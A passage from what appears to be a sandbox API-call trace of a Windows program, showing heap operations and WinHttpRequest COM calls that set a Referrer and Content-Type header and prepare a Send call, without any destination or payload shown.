riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x7df468*="SetRequestHeader", cNames=0x1, lcid=0x800, rgDispId=0x7df56c | out: rgDispId=0x7df56c*=2) returned 0x0 [0258.920] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xded840 | out: hHeap=0xbc0000) returned 1 [0258.920] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xc02980, iTInfo=0x0, lcid=0x800, ppTInfo=0x7df460 | out: ppTInfo=0x7df460*=0xc18e14) returned 0x0 [0258.920] ITypeInfo:RemoteGetTypeAttr (in: This=0xc18e14, ppTypeAttr=0x7df458, pDummy=0x356310 | out: ppTypeAttr=0x7df458, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.920] ITypeInfo:LocalGetIDsOfNames (This=0xc18e14) returned 0x0 [0258.920] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x0, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.920] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.920] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x1, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.920] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xbfb318 [0258.920] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x2, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.920] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xbfb318 [0258.920] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x3, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.920] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.920] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x4, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.920] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.920] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x5, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.921] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.921] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x6, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.921] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.921] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x7, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.921] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.921] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x8, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.921] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.921] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x9, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.921] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.921] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0xa, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.921] ITypeInfo:LocalReleaseTypeAttr (This=0xc18e14) returned 0xdaa568 [0258.921] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.921] WinHttpRequest:IUnknown:Release (This=0xc18e14) returned 0x1 [0258.921] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x34) returned 0xe2bf18 [0258.921] WinHttpRequest:IDispatch:Invoke (in: This=0xc02980, dispIdMember=2, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x7df550*(rgvarg=([0]=0xe2bf1c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="http://www.yahoo.com", varVal2=0x0), [1]=0xe2bf2c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Referrer", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x7df518, puArgErr=0x7df560 | out: pDispParams=0x7df550*(rgvarg=([0]=0xe2bf1c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="http://www.yahoo.com", varVal2=0x0), [1]=0xe2bf2c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Referrer", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x7df518*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x7df560*=0x2b5995) returned 0x0 [0258.921] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xceca78 | out: hHeap=0xbc0000) returned 1 [0258.922] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda510 [0258.922] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcdaa38 [0258.922] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01ad8 [0258.922] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe2bf18 | out: hHeap=0xbc0000) returned 1 [0258.922] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda348 | out: hHeap=0xbc0000) returned 1 [0258.922] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0258.922] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda348 [0258.922] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda510 | out: hHeap=0xbc0000) returned 1 [0258.922] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe3a020 | out: hHeap=0xbc0000) returned 1 [0258.922] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01a78 | out: hHeap=0xbc0000) returned 1 [0258.922] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda258 | out: hHeap=0xbc0000) returned 1 [0258.922] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda3a8 | out: hHeap=0xbc0000) returned 1 [0258.922] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda930 | out: hHeap=0xbc0000) returned 1 [0258.922] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda270 | out: hHeap=0xbc0000) returned 1 [0258.922] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde6e90 | out: hHeap=0xbc0000) returned 1 [0258.922] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0258.922] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdaa38 | out: hHeap=0xbc0000) returned 1 [0258.922] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01ad8 | out: hHeap=0xbc0000) returned 1 [0258.922] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda348 | out: hHeap=0xbc0000) returned 1 [0258.922] PeekMessageW (in: lpMsg=0x7dfb5c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb5c) returned 0 [0258.922] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01ad8 [0258.923] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda348 [0258.923] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b28 [0258.923] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda348 | out: hHeap=0xbc0000) returned 1 [0258.923] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xe3a020 [0258.923] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xde6e90 [0258.923] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcda348 [0258.923] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcdaa38 [0258.923] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcda270 [0258.923] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcda930 [0258.923] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda3a8 [0258.923] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcda258 [0258.923] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01a78 [0258.923] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda510 [0258.923] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01a78 | out: hHeap=0xbc0000) returned 1 [0258.923] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xde6e68 [0258.923] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda390 [0258.923] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda2e8 [0258.923] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01a78 [0258.923] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda510 | out: hHeap=0xbc0000) returned 1 [0258.923] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda510 [0258.923] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01a78 | out: hHeap=0xbc0000) returned 1 [0258.923] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda3f0 [0258.924] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcdb620 [0258.924] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda510 | out: hHeap=0xbc0000) returned 1 [0258.924] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdaa38 | out: hHeap=0xbc0000) returned 1 [0258.924] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda348 | out: hHeap=0xbc0000) returned 1 [0258.924] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda270 | out: hHeap=0xbc0000) returned 1 [0258.924] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda3a8 | out: hHeap=0xbc0000) returned 1 [0258.924] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda930 | out: hHeap=0xbc0000) returned 1 [0258.924] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda258 | out: hHeap=0xbc0000) returned 1 [0258.924] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde6e90 | out: hHeap=0xbc0000) returned 1 [0258.924] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda258 [0258.924] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01a78 [0258.924] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x18) returned 0xceca78 [0258.924] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x22) returned 0xded840 [0258.924] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xc02980, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x7df468*="SetRequestHeader", cNames=0x1, lcid=0x800, rgDispId=0x7df56c | out: rgDispId=0x7df56c*=2) returned 0x0 [0258.924] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xded840 | out: hHeap=0xbc0000) returned 1 [0258.924] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xc02980, iTInfo=0x0, lcid=0x800, ppTInfo=0x7df460 | out: ppTInfo=0x7df460*=0xc18e14) returned 0x0 [0258.924] ITypeInfo:RemoteGetTypeAttr (in: This=0xc18e14, ppTypeAttr=0x7df458, pDummy=0x356310 | out: ppTypeAttr=0x7df458, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.924] ITypeInfo:LocalGetIDsOfNames (This=0xc18e14) returned 0x0 [0258.924] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x0, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.924] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.924] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x1, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.924] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xbfb318 [0258.924] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x2, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.924] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xbfb318 [0258.925] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x3, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.925] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.925] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x4, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.925] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.925] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x5, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.925] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.925] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x6, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.925] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.925] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x7, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.925] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.925] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x8, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.925] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.925] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x9, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.925] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.925] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0xa, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.925] ITypeInfo:LocalReleaseTypeAttr (This=0xc18e14) returned 0xdaa568 [0258.925] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.925] WinHttpRequest:IUnknown:Release (This=0xc18e14) returned 0x1 [0258.925] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x34) returned 0xe2bf18 [0258.926] WinHttpRequest:IDispatch:Invoke (in: This=0xc02980, dispIdMember=2, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x7df550*(rgvarg=([0]=0xe2bf1c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="application/x-www-form-urlencoded", varVal2=0x0), [1]=0xe2bf2c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Content-Type", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x7df518, puArgErr=0x7df560 | out: pDispParams=0x7df550*(rgvarg=([0]=0xe2bf1c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="application/x-www-form-urlencoded", varVal2=0x0), [1]=0xe2bf2c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Content-Type", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x7df518*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x7df560*=0x2b5995) returned 0x0 [0258.926] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xceca78 | out: hHeap=0xbc0000) returned 1 [0258.926] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda3a8 [0258.926] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda270 [0258.926] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b58 [0258.926] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe2bf18 | out: hHeap=0xbc0000) returned 1 [0258.926] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda258 | out: hHeap=0xbc0000) returned 1 [0258.926] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01a78 | out: hHeap=0xbc0000) returned 1 [0258.926] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda258 [0258.926] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda3a8 | out: hHeap=0xbc0000) returned 1 [0258.926] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe3a020 | out: hHeap=0xbc0000) returned 1 [0258.926] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0258.926] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda2e8 | out: hHeap=0xbc0000) returned 1 [0258.926] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda390 | out: hHeap=0xbc0000) returned 1 [0258.926] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdb620 | out: hHeap=0xbc0000) returned 1 [0258.926] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda3f0 | out: hHeap=0xbc0000) returned 1 [0258.926] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde6e68 | out: hHeap=0xbc0000) returned 1 [0258.926] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01ad8 | out: hHeap=0xbc0000) returned 1 [0258.926] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda270 | out: hHeap=0xbc0000) returned 1 [0258.927] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0258.927] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda258 | out: hHeap=0xbc0000) returned 1 [0258.927] PeekMessageW (in: lpMsg=0x7dfb5c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb5c) returned 0 [0258.927] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0258.927] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda258 [0258.927] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01ad8 [0258.927] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xde6e68 [0258.927] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcda270 [0258.928] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda3f0 [0258.928] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcdb620 [0258.928] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xde6e90 [0258.928] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda390 [0258.928] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda3f0 | out: hHeap=0xbc0000) returned 1 [0258.928] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda270 | out: hHeap=0xbc0000) returned 1 [0258.928] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdb620 | out: hHeap=0xbc0000) returned 1 [0258.928] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde6e68 | out: hHeap=0xbc0000) returned 1 [0258.928] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcdb620 [0258.928] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b28 [0258.928] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x18) returned 0xceca78 [0258.928] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xa) returned 0xcda270 [0258.928] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xc02980, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x7df468*="Send", cNames=0x1, lcid=0x800, rgDispId=0x7df56c | out: rgDispId=0x7df56c*=5) returned 0x0 [0258.928] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda270 | out: hHeap=0xbc0000) returned 1 [0258.928] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xc02980, iTInfo=0x0, lcid=0x800, ppTInfo=0x7df460 | out: ppTInfo=0x7df460*=0xc18e14) returned 0x0 [0258.929] ITypeInfo:RemoteGetTypeAttr (in: This=0xc18e14, ppTypeAttr=0x7df458, pDummy=0x356310 | out: ppTypeAttr=0x7df458, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.929] ITypeInfo:LocalGetIDsOfNames (This=0xc18e14) returned 0x0 [0258.929] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x0, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.929] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.929] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x1, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.929] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xbfb318 [0258.929] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x2, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.929] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xbfb318 [0258.929] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x3, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.929] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.929] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x4, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.929] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.929] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x5, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.929] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.929] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x6, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.929] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.929] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x7, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.929] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.929] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x8, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.929] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.929] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x9, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.930] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.930] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0xa, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.930] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.930] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0xb, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.930] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.930] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0xc, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.930] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.930] 